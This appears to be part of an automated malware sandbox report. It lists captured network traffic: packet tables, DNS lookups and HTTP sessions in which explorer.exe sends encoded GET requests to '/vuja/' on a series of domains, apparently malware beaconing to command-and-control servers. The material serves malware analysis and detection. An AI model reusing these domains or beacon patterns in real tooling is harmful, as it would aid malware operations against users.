                                            Sep 15, 2021 10:10:08.849975109 CEST4978280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:08.868742943 CEST804978234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:08.965112925 CEST804978234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:08.965140104 CEST804978234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:08.965301991 CEST4978280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:08.965415001 CEST4978280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:09.265618086 CEST4978280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:09.284578085 CEST804978234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:14.041023016 CEST4978780192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:14.065136909 CEST804978734.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:14.065464973 CEST4978780192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:14.066011906 CEST4978780192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:14.085696936 CEST804978734.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:14.181255102 CEST804978734.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:14.181319952 CEST804978734.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:14.181651115 CEST4978780192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:14.181672096 CEST4978780192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:14.484749079 CEST4978780192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:14.503680944 CEST804978734.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:19.233666897 CEST4978880192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:19.252449989 CEST804978891.195.240.94192.168.2.3
                                            Sep 15, 2021 10:10:19.252635002 CEST4978880192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:19.252830982 CEST4978880192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:19.272996902 CEST804978891.195.240.94192.168.2.3
                                            Sep 15, 2021 10:10:19.290005922 CEST804978891.195.240.94192.168.2.3
                                            Sep 15, 2021 10:10:19.290040016 CEST804978891.195.240.94192.168.2.3
                                            Sep 15, 2021 10:10:19.290277958 CEST4978880192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:19.290385962 CEST4978880192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:19.310718060 CEST804978891.195.240.94192.168.2.3
                                            Sep 15, 2021 10:10:24.503412008 CEST4978980192.168.2.3103.72.144.19
                                            Sep 15, 2021 10:10:24.817097902 CEST8049789103.72.144.19192.168.2.3
                                            Sep 15, 2021 10:10:24.817893982 CEST4978980192.168.2.3103.72.144.19
                                            Sep 15, 2021 10:10:24.818169117 CEST4978980192.168.2.3103.72.144.19
                                            Sep 15, 2021 10:10:25.132307053 CEST8049789103.72.144.19192.168.2.3
                                            Sep 15, 2021 10:10:25.132343054 CEST8049789103.72.144.19192.168.2.3
                                            Sep 15, 2021 10:10:25.132352114 CEST8049789103.72.144.19192.168.2.3
                                            Sep 15, 2021 10:10:25.135516882 CEST4978980192.168.2.3103.72.144.19
                                            Sep 15, 2021 10:10:25.135601997 CEST4978980192.168.2.3103.72.144.19
                                            Sep 15, 2021 10:10:25.454338074 CEST8049789103.72.144.19192.168.2.3
                                            Sep 15, 2021 10:10:30.264316082 CEST4979080192.168.2.334.102.136.180
                                            Sep 15, 2021 10:10:30.285715103 CEST804979034.102.136.180192.168.2.3
                                            Sep 15, 2021 10:10:30.285825014 CEST4979080192.168.2.334.102.136.180
                                            Sep 15, 2021 10:10:30.286042929 CEST4979080192.168.2.334.102.136.180
                                            Sep 15, 2021 10:10:30.310519934 CEST804979034.102.136.180192.168.2.3
                                            Sep 15, 2021 10:10:30.401585102 CEST804979034.102.136.180192.168.2.3
                                            Sep 15, 2021 10:10:30.401640892 CEST804979034.102.136.180192.168.2.3
                                            Sep 15, 2021 10:10:30.401880026 CEST4979080192.168.2.334.102.136.180
                                            Sep 15, 2021 10:10:30.401911974 CEST4979080192.168.2.334.102.136.180
                                            Sep 15, 2021 10:10:30.707046032 CEST4979080192.168.2.334.102.136.180
                                            Sep 15, 2021 10:10:30.726382971 CEST804979034.102.136.180192.168.2.3
                                            Sep 15, 2021 10:10:40.488914013 CEST4979180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:40.510979891 CEST804979199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:40.511141062 CEST4979180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:40.511245966 CEST4979180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:40.532310963 CEST804979199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:40.680717945 CEST804979199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:40.680741072 CEST804979199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:40.681369066 CEST4979180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:40.681411982 CEST4979180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:40.697202921 CEST804979199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:40.700391054 CEST4979180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:40.705658913 CEST804979199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:45.731671095 CEST4979280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:45.753977060 CEST804979234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:45.754204988 CEST4979280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:45.754266024 CEST4979280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:45.773391962 CEST804979234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:45.871160984 CEST804979234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:45.872540951 CEST4979280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:45.872602940 CEST804979234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:45.872720003 CEST4979280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:45.891458988 CEST804979234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:50.911632061 CEST4979380192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:50.930871964 CEST804979391.195.240.94192.168.2.3
                                            Sep 15, 2021 10:10:50.930979013 CEST4979380192.168.2.391.195.240.94
                                            Sep 15, 2021 10:10:50.931049109 CEST4979380192.168.2.391.195.240.94

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 15, 2021 10:08:25.316128016 CEST5062053192.168.2.38.8.8.8
                                            Sep 15, 2021 10:08:25.350845098 CEST53506208.8.8.8192.168.2.3
                                            Sep 15, 2021 10:08:52.204672098 CEST6493853192.168.2.38.8.8.8
                                            Sep 15, 2021 10:08:52.235321045 CEST53649388.8.8.8192.168.2.3
                                            Sep 15, 2021 10:08:57.434880018 CEST6015253192.168.2.38.8.8.8
                                            Sep 15, 2021 10:08:57.477111101 CEST53601528.8.8.8192.168.2.3
                                            Sep 15, 2021 10:09:18.122143984 CEST5754453192.168.2.38.8.8.8
                                            Sep 15, 2021 10:09:18.162800074 CEST53575448.8.8.8192.168.2.3
                                            Sep 15, 2021 10:09:23.468075037 CEST5598453192.168.2.38.8.8.8
                                            Sep 15, 2021 10:09:23.512341022 CEST53559848.8.8.8192.168.2.3
                                            Sep 15, 2021 10:09:35.609021902 CEST6418553192.168.2.38.8.8.8
                                            Sep 15, 2021 10:09:35.639624119 CEST53641858.8.8.8192.168.2.3
                                            Sep 15, 2021 10:09:57.940447092 CEST6511053192.168.2.38.8.8.8
                                            Sep 15, 2021 10:09:58.132829905 CEST53651108.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:03.536367893 CEST5836153192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:03.597603083 CEST53583618.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:08.785339117 CEST6349253192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:08.826334000 CEST53634928.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:10.227674961 CEST6083153192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:10.265500069 CEST53608318.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:11.977534056 CEST6010053192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:12.013201952 CEST53601008.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:14.004148006 CEST5319553192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:14.038501024 CEST53531958.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:19.195137978 CEST5014153192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:19.232110977 CEST53501418.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:24.317293882 CEST5302353192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:24.501940012 CEST53530238.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:30.179683924 CEST4956353192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:30.254374981 CEST53495638.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:40.425901890 CEST5135253192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:40.488056898 CEST53513528.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:45.692493916 CEST5934953192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:45.730973005 CEST53593498.8.8.8192.168.2.3
                                            Sep 15, 2021 10:10:50.880100965 CEST5708453192.168.2.38.8.8.8
                                            Sep 15, 2021 10:10:50.911007881 CEST53570848.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Sep 15, 2021 10:09:57.940447092 CEST192.168.2.38.8.8.80xf5c4Standard query (0)www.cherrybunk.lifeA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:03.536367893 CEST192.168.2.38.8.8.80x1fabStandard query (0)www.d0berman245.xyzA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:08.785339117 CEST192.168.2.38.8.8.80x85e0Standard query (0)www.fraktal.mediaA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:14.004148006 CEST192.168.2.38.8.8.80xd94Standard query (0)www.expertexceleratorchallenge.comA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:19.195137978 CEST192.168.2.38.8.8.80xeaaStandard query (0)www.hellocharmaine.comA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:24.317293882 CEST192.168.2.38.8.8.80xd2e9Standard query (0)www.syzhtr.comA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:30.179683924 CEST192.168.2.38.8.8.80x5b41Standard query (0)www.tjandamber.comA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:40.425901890 CEST192.168.2.38.8.8.80x36e1Standard query (0)www.realstylecelebz.comA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:45.692493916 CEST192.168.2.38.8.8.80x881bStandard query (0)www.dressmids.comA (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:50.880100965 CEST192.168.2.38.8.8.80x1a3fStandard query (0)www.discomountainkombucha.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Sep 15, 2021 10:09:58.132829905 CEST8.8.8.8192.168.2.30xf5c4No error (0)www.cherrybunk.life52.25.92.0A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:03.597603083 CEST8.8.8.8192.168.2.30x1fabNo error (0)www.d0berman245.xyz99.83.154.118A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:08.826334000 CEST8.8.8.8192.168.2.30x85e0No error (0)www.fraktal.mediafraktal.mediaCNAME (Canonical name)IN (0x0001)
                                            Sep 15, 2021 10:10:08.826334000 CEST8.8.8.8192.168.2.30x85e0No error (0)fraktal.media34.98.99.30A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:14.038501024 CEST8.8.8.8192.168.2.30xd94No error (0)www.expertexceleratorchallenge.comexpertexceleratorchallenge.comCNAME (Canonical name)IN (0x0001)
                                            Sep 15, 2021 10:10:14.038501024 CEST8.8.8.8192.168.2.30xd94No error (0)expertexceleratorchallenge.com34.98.99.30A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:19.232110977 CEST8.8.8.8192.168.2.30xeaaNo error (0)www.hellocharmaine.com91.195.240.94A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:24.501940012 CEST8.8.8.8192.168.2.30xd2e9No error (0)www.syzhtr.com103.72.144.19A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:30.254374981 CEST8.8.8.8192.168.2.30x5b41No error (0)www.tjandamber.comtjandamber.comCNAME (Canonical name)IN (0x0001)
                                            Sep 15, 2021 10:10:30.254374981 CEST8.8.8.8192.168.2.30x5b41No error (0)tjandamber.com34.102.136.180A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:40.488056898 CEST8.8.8.8192.168.2.30x36e1No error (0)www.realstylecelebz.com99.83.154.118A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:45.730973005 CEST8.8.8.8192.168.2.30x881bNo error (0)www.dressmids.comdressmids.comCNAME (Canonical name)IN (0x0001)
                                            Sep 15, 2021 10:10:45.730973005 CEST8.8.8.8192.168.2.30x881bNo error (0)dressmids.com34.98.99.30A (IP address)IN (0x0001)
                                            Sep 15, 2021 10:10:50.911007881 CEST8.8.8.8192.168.2.30x1a3fNo error (0)www.discomountainkombucha.com91.195.240.94A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.cherrybunk.life
                                            • www.d0berman245.xyz
                                            • www.fraktal.media
                                            • www.expertexceleratorchallenge.com
                                            • www.hellocharmaine.com
                                            • www.syzhtr.com
                                            • www.tjandamber.com
                                            • www.realstylecelebz.com
                                            • www.dressmids.com
                                            • www.discomountainkombucha.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.34978052.25.92.080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:09:58.335856915 CEST4134OUTGET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1
                                            Host: www.cherrybunk.life
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:09:58.520955086 CEST4136INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 15 Sep 2021 08:09:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 61 33 61 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 20 69 73 20 45 78 70 69 72 65 64 20 6f 72 20 53 75 73 70 65 6e 64 65 64 2e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 2e 67 72 61 64 69 65 6e 74 20 7b 0a 09 09 09 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 0a 09 09 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 21 2d 2d 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 6c 61 63 6b 62 6f 61 72 64 22 3e 2d 2d 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 74 6f 6b 79 6f 31 22 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 3f 61 64 72 65 66 3d 6e 73 65 78 70 5f 61 64 26 61 72 67 75 6d 65 6e 74 3d 44 4c 48 74 73 72 67 7a 26 64 6d 61 69 3d 61 35 62 35 61 38 30 39 31 36 38 38 38 36 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73 73 3d 22 62 6e 72 4c 69 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 63 6f 6d 6d 6f 6e 2f 69 6d 67 2f 62 6e 72 2f 63 6f 6c 6f 72 66 75 6c 62 6f 78 5f 62 6e 72 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 76 61 6c 69 64 22 3e 0a 09 3c 68 31 3e 0a 09 09 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 69 6d 67 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 0a 09 09 3c 70 3e e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 2f 70 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 30 31 22 3e e3 80 8c 20 3c 73 70 61 6e 3e 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 3c 2f 73 70 61 6e 3e 20 e3 80 8d e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 af e3 80 81 e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 62 72 3e e3 82 a6 e3 82 a7 e3 83 96 e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 e3 81 ae e6 96 b9 e3 81 af 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 61 6c 75 65 2d 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 6d 6f 64 61 6c 6c 2e 70 68 70 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e e3 81 93 e3 81 a1 e3 82 89 e3 81 8b e3 82 89 e5 a4 89 e6 9b b4 e3 83 bb e6 9b b4 e6 96 b0 3c 2f 61 3e e3 82 92 e8 a1 8c e3 81 a3 e3 81 a6 e3 81 8f e3 81 a0 e3
                                            Data Ascii: a3a<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>www.cherrybunk.life is Expired or Suspended.</title><link rel="stylesheet" type="text/css" href="style.css"><meta name="robots" content="noindex" />...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]--></head>...<body class="blackboard">--><body class="tokyo1"><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink" rel="nofollow"><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="img/img01.png" alt=""><p></p></h1><div><p class="txt01"> <span>www.cherrybunk.life</span> <br><a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow"></a>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.34978199.83.154.11880C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:03.618793011 CEST4138OUTGET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.d0berman245.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:03.777625084 CEST4138INHTTP/1.1 403 Forbidden
                                            Date: Wed, 15 Sep 2021 08:10:03 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Server: nginx
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.34978234.98.99.3080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:08.849975109 CEST4140OUTGET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1
                                            Host: www.fraktal.media
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:08.965112925 CEST4141INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:08 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139ed55-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.34978734.98.99.3080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:14.066011906 CEST4161OUTGET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.expertexceleratorchallenge.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:14.181255102 CEST4162INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:14 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139efab-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34978891.195.240.9480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 15, 2021 10:10:19.252830982 CEST4163OUTGET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1
                                            Host: www.hellocharmaine.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:19.290005922 CEST4164INHTTP/1.1 301 Moved Permanently
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY
                                            Date: Wed, 15 Sep 2021 08:10:19 GMT
                                            Content-Length: 172
                                            Connection: close
                                            Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 65 6c 6c 6f 63 68 61 72 6d 61 69 6e 65 2e 63 6f 6d 2f 76 75 6a 61 2f 3f 53 72 4b 30 6d 3d 38 70 62 4c 75 38 6c 30 53 56 31 6c 6f 26 61 6d 70 3b 61 36 50 4c 64 48 36 3d 48 69 46 32 4a 6d 56 32 6f 77 50 71 38 48 65 76 59 2b 36 50 4c 48 30 6c 33 4b 67 69 44 62 74 66 38 58 4f 6f 4f 4d 58 76 52 58 67 56 44 78 44 4c 78 6a 57 65 62 48 49 39 50 77 34 38 38 76 4d 6b 39 4f 52 59 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
